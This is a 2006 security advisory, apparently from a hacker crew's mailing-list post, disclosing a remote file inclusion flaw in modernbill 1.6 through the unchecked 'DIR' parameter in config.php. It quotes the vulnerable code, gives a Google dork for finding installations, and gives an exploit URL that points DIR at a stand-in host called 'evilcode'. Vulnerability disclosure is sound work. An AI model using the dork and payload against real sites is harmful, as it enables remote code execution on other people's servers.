<<< Date Index >>>     <<< Thread Index >>>

SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion



#############################SolpotCrew 
Community################################ 
# 
# modernbill ver 1.6 (DIR) Remote File Inclusion 
# 
# Download file : http://freshmeat.net/projects/modernbill/
# 
#################################################################################
 
# 
# 
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
# 
# contact: chris_hasibuan@xxxxxxxxx 
# 
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
# 
################################################################################
 
# 
# 
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , 
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net 
# 
# 
############################################################################### 
Input passed to the "DIR" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources. 

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE######################### 
######################################E.O.F##################################